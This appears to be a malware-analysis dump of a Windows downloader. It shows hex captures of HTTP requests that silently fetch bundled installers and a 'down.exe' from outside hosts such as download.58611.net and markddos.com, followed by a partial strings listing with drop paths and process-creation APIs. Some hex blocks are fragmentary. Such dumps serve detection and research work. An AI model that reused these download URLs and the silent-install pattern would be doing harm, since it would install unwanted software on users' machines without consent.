0x00000090 (00144)   70743a20 2a2f2a0d 0a486f73 743a2064   pt: */*..Host: d
0x000000a0 (00160)   6c73772e 62722e62 61696475 2e636f6d   lsw.br.baidu.com
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f646974 75692f7a 756a6961   GET /ditui/zujia
0x00000010 (00016)   6e2f6264 42726f77 73657253 65747570   n/bdBrowserSetup
0x00000020 (00032)   2d353935 362d6674 6e5f3130 30303135   -5956-ftn_100015
0x00000030 (00048)   31393435 2e657865 20485454 502f312e   1945.exe HTTP/1.
0x00000040 (00064)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000050 (00080)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000060 (00096)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000070 (00112)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000080 (00128)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000090 (00144)   486f7374 3a20646c 73772e62 722e6261   Host: dlsw.br.ba
0x000000a0 (00160)   6964752e 636f6d0d 0a436163 68652d43   idu.com..Cache-C
0x000000b0 (00176)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000c0 (00192)   0d0a0d0a 63616368 650d0a0d 0a         ....cache....

0x00000000 (00000)   47455420 2f646974 75692f7a 756a6961   GET /ditui/zujia
0x00000010 (00016)   6e2f4261 69647550 696e7969 6e536574   n/BaiduPinyinSet
0x00000020 (00032)   75705f32 2e31332e 332e3030 5f73772d   up_2.13.3.00_sw-
0x00000030 (00048)   30303030 31353139 34352e65 78652048   0000151945.exe H
0x00000040 (00064)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e30290d 0a416363 6570743a   NT 5.0)..Accept:
0x00000090 (00144)   202a2f2a 0d0a486f 73743a20 646c7377    */*..Host: dlsw
0x000000a0 (00160)   2e62722e 62616964 752e636f 6d0d0a43   .br.baidu.com..C
0x000000b0 (00176)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000c0 (00192)   2d636163 68650d0a 0d0a0a0d 0a         -cache.......

0x00000000 (00000)   47455420 2f717150 43547261 795f7369   GET /qqPCTray_si
0x00000010 (00016)   6c656e74 2f717170 636d6772 5f73696c   lent/qqpcmgr_sil
0x00000020 (00032)   656e745f 37383231 33303234 382e6578   ent_782130248.ex
0x00000030 (00048)   65204854 54502f31 2e310d0a 55736572   e HTTP/1.1..User
0x00000040 (00064)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000050 (00080)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000060 (00096)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000070 (00112)   7773204e 5420352e 30290d0a 41636365   ws NT 5.0)..Acce
0x00000080 (00128)   70743a20 2a2f2a0d 0a486f73 743a2064   pt: */*..Host: d
0x00000090 (00144)   6f776e6c 6f61642e 35383631 312e6e65   ownload.58611.ne
0x000000a0 (00160)   743a3831 38310d0a 43616368 652d436f   t:8181..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f70696e 79696e2f 62647069   GET /pinyin/bdpi
0x00000010 (00016)   6e79696e 5f73696c 656e745f 37383231   nyin_silent_7821
0x00000020 (00032)   33303234 382e6578 65204854 54502f31   30248.exe HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000050 (00080)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000060 (00096)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000070 (00112)   30290d0a 41636365 70743a20 2a2f2a0d   0)..Accept: */*.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642e   .Host: download.
0x00000090 (00144)   35383631 312e6e65 743a3831 38310d0a   58611.net:8181..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a61 6368650d   o-cache....ache.
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f707073 2f707073 5f73696c   GET /pps/pps_sil
0x00000010 (00016)   656e745f 37383231 33303234 382e6578   ent_782130248.ex
0x00000020 (00032)   65204854 54502f31 2e310d0a 55736572   e HTTP/1.1..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 30290d0a 41636365   ws NT 5.0)..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a486f73 743a2064   pt: */*..Host: d
0x00000080 (00128)   6f776e6c 6f61642e 35383631 312e6e65   ownload.58611.ne
0x00000090 (00144)   743a3831 38310d0a 43616368 652d436f   t:8181..Cache-Co
0x000000a0 (00160)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000b0 (00176)   0a0d0a61 6368650d 0a0d0a61 6368650d   ...ache....ache.
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f68616f 7a69705f 73696c65   GET /haozip_sile
0x00000010 (00016)   6e742f68 616f7a69 705f7369 6c656e74   nt/haozip_silent
0x00000020 (00032)   5f373832 31333032 34382e65 78652048   _782130248.exe H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e30290d 0a416363 6570743a   NT 5.0)..Accept:
0x00000080 (00128)   202a2f2a 0d0a486f 73743a20 646f776e    */*..Host: down
0x00000090 (00144)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000a0 (00160)   3138310d 0a436163 68652d43 6f6e7472   181..Cache-Contr
0x000000b0 (00176)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f706963 2f706963 5f73696c   GET /pic/pic_sil
0x00000010 (00016)   656e745f 37383231 33303234 382e6578   ent_782130248.ex
0x00000020 (00032)   65204854 54502f31 2e310d0a 55736572   e HTTP/1.1..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 30290d0a 41636365   ws NT 5.0)..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a486f73 743a2064   pt: */*..Host: d
0x00000080 (00128)   6f776e6c 6f61642e 35383631 312e6e65   ownload.58611.ne
0x00000090 (00144)   743a3831 38310d0a 43616368 652d436f   t:8181..Cache-Co
0x000000a0 (00160)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000b0 (00176)   0a0d0a20 6e6f2d63 61636865 0d0a0d0a   ... no-cache....
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f6b7577 6f5f7369 6c656e74   GET /kuwo_silent
0x00000010 (00016)   2f6b7577 6f5f7369 6c656e74 5f373832   /kuwo_silent_782
0x00000020 (00032)   31333032 34382e65 78652048 5454502f   130248.exe HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e30290d 0a416363 6570743a 202a2f2a   .0)..Accept: */*
0x00000080 (00128)   0d0a486f 73743a20 646f776e 6c6f6164   ..Host: download
0x00000090 (00144)   2e353836 31312e6e 65743a38 3138310d   .58611.net:8181.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 0d0a0d0a   no-cache........
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f707074 765f7369 6c656e74   GET /pptv_silent
0x00000010 (00016)   2f505054 565f666f 72716433 3033365f   /PPTV_forqd3036_
0x00000020 (00032)   30323133 342e6578 65204854 54502f31   02134.exe HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000050 (00080)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000060 (00096)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000070 (00112)   30290d0a 41636365 70743a20 2a2f2a0d   0)..Accept: */*.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642e   .Host: download.
0x00000090 (00144)   35383631 312e6e65 743a3831 38310d0a   58611.net:8181..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a0a 0d0a0d0a   o-cache.........
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f75706c 6f61642f 62647342   GET /upload/bdsB
0x00000010 (00016)   616f6665 6e673525 35422535 42313637   aofeng5%5B%5B167
0x00000020 (00032)   315f3032 31333425 35442535 442e6578   1_02134%5D%5D.ex
0x00000030 (00048)   65204854 54502f31 2e310d0a 55736572   e HTTP/1.1..User
0x00000040 (00064)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000050 (00080)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000060 (00096)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000070 (00112)   7773204e 5420352e 30290d0a 41636365   ws NT 5.0)..Acce
0x00000080 (00128)   70743a20 2a2f2a0d 0a486f73 743a2075   pt: */*..Host: u
0x00000090 (00144)   2e646c2e 62616f66 656e672e 636f6d0d   .dl.baofeng.com.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 0d0a0d0a   no-cache........
0x000000c0 (00192)   0a0d0a63 68650d0a 0d0a0a0d 0a         ...che.......

0x00000000 (00000)   47455420 2f66696c 652f6531 35373838   GET /file/e15788
0x00000010 (00016)   65356134 61356263 34636362 64386163   e5a4a5bc4ccbd8ac
0x00000020 (00032)   66636363 63646464 33623f62 6b743d70   fccccddd3b?bkt=p
0x00000030 (00048)   322d7164 2d323934 2678636f 64653d35   2-qd-294&xcode=5
0x00000040 (00064)   37643735 38313631 66363664 65373036   7d758161f66de706
0x00000050 (00080)   63636432 39346331 64663166 30383361   ccd294c1df1f083a
0x00000060 (00096)   64323364 66616339 62663662 32393930   d23dfac9bf6b2990
0x00000070 (00112)   62323937 37373032 64336536 37363426   b2977702d3e6764&
0x00000080 (00128)   6669643d 31383031 33363031 37342d32   fid=1801360174-2
0x00000090 (00144)   35303532 382d3130 30353534 30373839   50528-1005540789
0x000000a0 (00160)   32303534 31267469 6d653d31 34323738   20541&time=14278
0x000000b0 (00176)   36303839 33267369 676e3d46 44544158   60893&sign=FDTAX
0x000000c0 (00192)   45524c42 482d4443 62373430 63636335   ERLBH-DCb740ccc5
0x000000d0 (00208)   35313165 35653866 65646366 66303662   511e5e8fedcff06b
0x000000e0 (00224)   30383132 30332d46 46626170 71326d36   081203-FFbapq2m6
0x000000f0 (00240)   704b7651 67663638 5050446b 49625752   pKvQgf68PPDkIbWR
0x00000100 (00256)   69512533 4426746f 3d6e6263 26666d3d   iQ%3D&to=nbc&fm=
0x00000110 (00272)   4e616e2c 422c4d2c 6e792673 74615f64   Nan,B,M,ny&sta_d
0x00000120 (00288)   783d3226 7374615f 63733d31 26737461   x=2&sta_cs=1&sta
0x00000130 (00304)   5f66743d 65786526 7374615f 63743d30   _ft=exe&sta_ct=0
0x00000140 (00320)   266e6577 7665723d 31266e65 77666d3d   &newver=1&newfm=
0x00000150 (00336)   3126666c 6f775f76 65723d33 26736c3d   1&flow_ver=3&sl=
0x00000160 (00352)   38303334 37323132 26657870 69726573   80347212&expires
0x00000170 (00368)   3d386826 72743d73 6826723d 34313739   =8h&rt=sh&r=4179
0x00000180 (00384)   39373632 32266d6c 6f676964 3d333834   97622&mlogid=384
0x00000190 (00400)   34313932 36343026 76756b3d 31333734   4192640&vuk=1374
0x000001a0 (00416)   39313731 32267662 6469643d 33353430   91712&vbdid=3540
0x000001b0 (00432)   31303833 37342666 696e3d37 36353425   108374&fin=7654%
0x000001c0 (00448)   45392539 44253939 25453925 42422539   E9%9D%99%E9%BB%9
0x000001d0 (00464)   38254535 25384325 38352e65 78652666   8%E5%8C%85.exe&f
0x000001e0 (00480)   6e3d3736 35342545 39253944 25393925   n=7654%E9%9D%99%
0x000001f0 (00496)   45392542 42253938 25453525 38432538   E9%BB%98%E5%8C%8
0x00000200 (00512)   352e6578 65204854 54502f31 2e310d0a   5.exe HTTP/1.1..
0x00000210 (00528)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000220 (00544)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000230 (00560)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000240 (00576)   696e646f 7773204e 5420352e 30290d0a   indows NT 5.0)..
0x00000250 (00592)   41636365 70743a20 2a2f2a0d 0a486f73   Accept: */*..Hos
0x00000260 (00608)   743a206e 622e6361 6368652e 62616964   t: nb.cache.baid
0x00000270 (00624)   75706373 2e636f6d 0d0a4361 6368652d   upcs.com..Cache-
0x00000280 (00640)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000290 (00656)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f646f77 6e2e6578 65204854   GET /down.exe HT
0x00000010 (00016)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000020 (00032)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000030 (00048)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000040 (00064)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000050 (00080)   5420352e 30290d0a 41636365 70743a20   T 5.0)..Accept: 
0x00000060 (00096)   2a2f2a0d 0a486f73 743a2077 77772e6d   */*..Host: www.m
0x00000070 (00112)   61726b64 646f732e 636f6d3a 38353535   arkddos.com:8555
0x00000080 (00128)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000090 (00144)   206e6f2d 63616368 650d0a0d 0a373839    no-cache....789
0x000000a0 (00160)   32303534 31267469 6d653d31 34323738   20541&time=14278
0x000000b0 (00176)   36303839 33267369 676e3d46 44544158   60893&sign=FDTAX
0x000000c0 (00192)   45524c42 482d4443 62373430 63636335   ERLBH-DCb740ccc5
0x000000d0 (00208)   35313165 35653866 65646366 66303662   511e5e8fedcff06b
0x000000e0 (00224)   30383132 30332d46 46626170 71326d36   081203-FFbapq2m6
0x000000f0 (00240)   704b7651 67663638 5050446b 49625752   pKvQgf68PPDkIbWR
0x00000100 (00256)   69512533 4426746f 3d6e6263 26666d3d   iQ%3D&to=nbc&fm=
0x00000110 (00272)   4e616e2c 422c4d2c 6e792673 74615f64   Nan,B,M,ny&sta_d
0x00000120 (00288)   783d3226 7374615f 63733d31 26737461   x=2&sta_cs=1&sta
0x00000130 (00304)   5f66743d 65786526 7374615f 63743d30   _ft=exe&sta_ct=0
0x00000140 (00320)   266e6577 7665723d 31266e65 77666d3d   &newver=1&newfm=
0x00000150 (00336)   3126666c 6f775f76 65723d33 26736c3d   1&flow_ver=3&sl=
0x00000160 (00352)   38303334 37323132 26657870 69726573   80347212&expires
0x00000170 (00368)   3d386826 72743d73 6826723d 34313739   =8h&rt=sh&r=4179
0x00000180 (00384)   39373632 32266d6c 6f676964 3d333834   97622&mlogid=384
0x00000190 (00400)   34313932 36343026 76756b3d 31333734   4192640&vuk=1374
0x000001a0 (00416)   39313731 32267662 6469643d 33353430   91712&vbdid=3540
0x000001b0 (00432)   31303833 37342666 696e3d37 36353425   108374&fin=7654%
0x000001c0 (00448)   45392539 44253939 25453925 42422539   E9%9D%99%E9%BB%9
0x000001d0 (00464)   38254535 25384325 38352e65 78652666   8%E5%8C%85.exe&f
0x000001e0 (00480)   6e3d3736 35342545 39253944 25393925   n=7654%E9%9D%99%
0x000001f0 (00496)   45392542 42253938 25453525 38432538   E9%BB%98%E5%8C%8
0x00000200 (00512)   352e6578 65204854 54502f31 2e310d0a   5.exe HTTP/1.1..
0x00000210 (00528)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000220 (00544)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000230 (00560)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000240 (00576)   696e646f 7773204e 5420352e 30290d0a   indows NT 5.0)..
0x00000250 (00592)   41636365 70743a20 2a2f2a0d 0a486f73   Accept: */*..Hos
0x00000260 (00608)   743a206e 622e6361 6368652e 62616964   t: nb.cache.baid
0x00000270 (00624)   75706373 2e636f6d 0d0a4361 6368652d   upcs.com..Cache-
0x00000280 (00640)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000290 (00656)   650d0a0d 0a                           e....

Strings

....  ................
"#
....
.........
10/.-,+*)('&%$#"! ..............
.....
..........
..
.........
-
..
x
==
...
.
 
-% BbmHpAadYySMI \
.-E-0-0..
00-+ 
e
 
00...........?-  
0
0 
0
?
!/
u
    
 ......
 (*.*)
#####
#######
080404B0
 %1 
1.0.0.0
	1uM
(&C)
Comments
	Ctrl+
	Ctrl+D
	Ctrl+End
	Ctrl+G
	Ctrl+Home
	Ctrl+N
	Ctrl+PageDown
	Ctrl+PageUp
	&D.
DEFAULT_ICON
 DLL 
(&E)
FileDescription
FileVersion
Fjjj
Fjjjj
Fjjjjjjjj
         (((((                  H
(&H)
(http://www.eyuyan.com)
(&I)
 INI 
jjjj
jjjjjj
LegalCopyright
msctls_progress32
msctls_updown32
MS Shell Dlg
(&N)
(null)
(&O)
(&P)
	PageDown
	PageUp
ProductName
ProductVersion
Progress1
 %s 
(&S)
	Shift+Tab
Spin1
StringFileInfo
(&T)
	Tab/Enter
TEXTINCLUDE
Translation
VarFileInfo
VS_VERSION_INFO
xxxx
^,_^][
^$_^[]
 (*.*)|*.*||
	!	!	!	!	
(&07-034/)7 '
0dk:ghV
0R>\W[
,1"52.*
1#QNAN
1#SNAN
	2	5	5	5	5	5
%+.2d%.2d
\$4t|Ht@H
|?5^<@
5	!	!	!	!
	5	5	5
	6	6	6	6
	6	6	6	6	6	6	6	6	6	6	,	,	,	,	,	,	,	,	+	+	+	+	+	/	/	/	'	'	'	'	'	'	'	'	'	'	(	(	(	(	(	(	(	(	(	(	(	(	(	
707ca37322474f6ca841f0e224f4b620
	7	7	7	7	7	7	7	7	7	7	7	*	*	-	-	-	-
8MThdu
\$8UVW
9^0u/j
^}%950lH
'9A`u"9
9D$$t+
9L$x~e
9l$xtU9
9nPu	9^T
9o4u'V
	9oTtc
9t$0v8
9^xu5j
<A|2<Z
abcddefghijklmnoopqrrsstuvvwwxyyz;
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abnormal program termination
Accept: */*
Accept: */* 
%a, %d %b %Y %H:%M:%S 
AdjustWindowRectEx
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
Afx:%x:%x
Afx:%x:%x:%x:%x:%x
AppendMenuA
.?AUCThreadData@@
August
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CHECKLIST_STATE@@
.?AV_AFX_COLOR_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_SOCK_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVCArchiveException@@
.?AVCBitmap@@
.?AVCBrush@@
.?AVCButton@@
.?AVCClientDC@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCColorDialog@@
.?AVCComboBox@@
.?AVCCommonDialog@@
.?AVCCriticalSection@@
.?AVCDC@@
.?AVCDialog@@
.?AVCDWordArray@@
.?AVCEdit@@
.?AVCException@@
.?AVCFile@@
.?AVCFileDialog@@
.?AVCFileException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCImageList@@
.?AVCMapPtrToPtr@@
.?AVCMapStringToPtr@@
.?AVCMemFile@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCPaintDC@@
.?AVCPen@@
.?AVCProgressCtrl@@
.?AVCPtrArray@@
.?AVCPtrList@@
.?AVCResourceException@@
.?AVCRgn@@
.?AVCSessionMapPtrToPtr@@
.?AVCSharedFile@@
.?AVCSimpleException@@
.?AVCStatic@@
.?AVCStringArray@@
.?AVCSyncObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempImageList@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCToolTipCtrl@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWindowDC@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVCWordArray@@
.?AVtype_info@@
<A|@<Z
B 02CV
bcdfghijklmnpqrstuvwxyz
BeginPaint
BeginPath
BitBlt
BKbhTb~XBK!;
 (*.BMP)|*.BMP|GIF
Bogus message code %d
BRPj+S
C =02CVu
C:\2345explorer_k87648162.exe
C:\2345haozip_k87648162.exe
C:2345haozip_k87648162.exe
C:\2345pcsafe_k87648162.exe
C:\7654
CallNextHookEx
CallWindowProcA
CArchiveException
C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe
C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe
C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe
C:\bdBrowserSetup-5956-ftn_1000151945.exe
C:\bdpinyin_silent_782130248.exe
C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe
CBitmap
CBrush
CButton
CClientDC
CCmdTarget
CColorDialog
CColourPicker
CComboBox
CCriticalSection
Cc: %s
CDialog
C:\dscKAVSETUPS_66_130903.exe
CDWordArray
CException
CFileDialog
CFileException
CGdiObject
C:\haozip_silent_782130248.exe
CharUpperA
CheckMenuItem
ChildWindowFromPointEx
ChooseColorA
CImageList
C:\jifen_2345/2345explorer_k87648162.exe
C:\kuwo_silent_782130248.exe
ck(WSbpS
ClientToScreen
C:\lkfish_k87648162_332947.exe
CloseClipboard
CloseDatabase
CloseHandle
ClosePrinter
CLSIDFromString
CMapPtrToPtr
CMapStringToPtr
CMemFile
CMemoryException
CNotSupportedException
CObject
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
commdlg_ColorOK
commdlg_FileNameOK
commdlg_help
commdlg_LBSelChangedNotify
commdlg_SetRGBColor
commdlg_ShareViolation
CompareStringA
CompareStringW
Content-Transfer-Encoding: base64
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-type: text/plain; charset="
CopyAcceleratorTableA
CopyRect
CPaintDC
CPalette
C:\pic_silent_782130248.exe
C:\pps_silent_782130248.exe
C:\PPTV_forqd3036_02134.exe
CProgressCtrl
CPtrArray
CPtrList
C:\qqpcmgr_silent_782130248.exe
CreateAcceleratorTableA
CreateBitmap
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateDialogIndirectParamA
CreateDIBitmap
CreateEllipticRgn
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIconFromResource
CreateIconFromResourceEx
CreateMenu
CreatePalette
CreatePen
CreatePolygonRgn
CreatePopupMenu
CreateProcessA
CreateRectRgn
CreateRectRgnIndirect
CreateRoundRectRgn
CreateSemaphoreA
CreateSolidBrush
CreateThread
CreateWindowExA
CResourceException
CSharedFile
CStatic
CStringArray
CSyncObject
CTempDC
CTempGdiObject
CTempImageList
CTempMenu
CTempWnd
CToolTipCtrl
Ctrl+A
Ctrl+B
Ctrl+C
Ctrl+D
Ctrl+E
Ctrl+F
Ctrl+F1
Ctrl+F10
Ctrl+F11
Ctrl+F12
Ctrl+F2
Ctrl+F3
Ctrl+F4
Ctrl+F5
Ctrl+F6
Ctrl+F7
Ctrl+F8
Ctrl+F9
Ctrl+G
Ctrl+H
Ctrl+I
Ctrl+J
Ctrl+K
Ctrl+L
Ctrl+M
Ctrl+N
Ctrl+O
Ctrl+P
Ctrl+Q
Ctrl+R
Ctrl+S
Ctrl+Shift+F1
Ctrl+Shift+F10
Ctrl+Shift+F11
Ctrl+Shift+F12
Ctrl+Shift+F2
Ctrl+Shift+F3
Ctrl+Shift+F4
Ctrl+Shift+F5
Ctrl+Shift+F6
Ctrl+Shift+F7
Ctrl+Shift+F8
Ctrl+Shift+F9
Ctrl+T
Ctrl+U
Ctrl+V
Ctrl+W
Ctrl+X
Ctrl+Y
Ctrl+Z
 (*.CUR)|*.CUR|
CUserException
CWinApp
CWindowDC
C:\Windows\boos.exe
CWinFormUnit
CWinThread
CWordArray
?? / %d]
D$ _^][
D$,_^]
D$,;\$|
D$(_^]
D$(_^][
D$$_^[
d09f2340818511d396f6aaf844c7e325
D$0WPQ
D$ |2;
D$49D$$}
D$89Vdu
D$8RPj
D$8VPQ
D$$~9+
@.data
Date: %s
D$(CUSWP
 %d/%d 
(%d-%d):
%d / %d
%d / %d]
dddd, MMMM dd, yyyy
D$dh,;H
D$dPQV
D$dQUWRP
D$dSUVW
D$DSWRPQ
D$DURP
December
DEFAULT_ICON
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
DefWindowProcA
DELETE
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
DestroyAcceleratorTable
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
device
devices
D$H_^][
D$hQRP
D$hRPQ
D$hSUV3
D$hUPQ
D$HUPQ
D$HUSj
DispatchMessageA
DISPLAY
D$(;l$ 
DllRegisterServer
DllUnregisterServer
D$LPUj
D$LUSWP
DocumentPropertiesA
DOMAIN error
D$,Pj<j
D$ PQR
D$PQRP
D$PRPQ
DPtoLP
D$(QPW
D$(QRP
D$$QUP
DrawEdge
DrawFocusRect
DrawFrameControl
DrawIconEx
DrawTextA
D$@RPQj
D$ RPUhD
D$,RVhP
D$,SPh
D$(SUV
D$$SUV
D$TRPW
D$TVPW
DuplicateHandle
D$@UPQ
|$D UV
D$@WPS
D$XPQU
D$XQRWP
;D$xt&
ech1Y%
EHPWVS
Ellipse
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndDoc
#endif
#endif //_WIN32
EndPage
EndPaint
EndPath
EnterCriticalSection
EnumDisplayMonitors
EnumDisplaySettingsA
eQpenc
EqualRect
Escape
ExcludeClipRect
ExitProcess
ExtSelectClipRgn
ExtTextOutA
F<_^][
F,_^][
F\_^][
F09^4u*j
F49^8u&j
F7FC1AE45C5C4758AF03EF19F18A395D
F89^8u&j
F(9V8tQ
FD@ul9L$(}f
FD uy9D$$}s
February
F%*.*f
F(_+F$^[;E
?fff&ff23
ffffff
ffffff`
fffffffff
fffffffffffhwww
fffffffffffo
fffffffffo
ffffff`ffo
fffffffh
F$@;F(v
F$@@;F(v
FileTimeToLocalFileTime
FileTimeToSystemTime
FillRect
FillRgn
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
F\jLSP
- floating point not loaded
FlushFileBuffers
foffffff
FpHt&Ht
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
From: %s
[/fS_MR
Fxt_;FTu@
GAIsProcessorFeaturePresent
g~b1Y%
gb2312
=?gb2312?B?
Gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
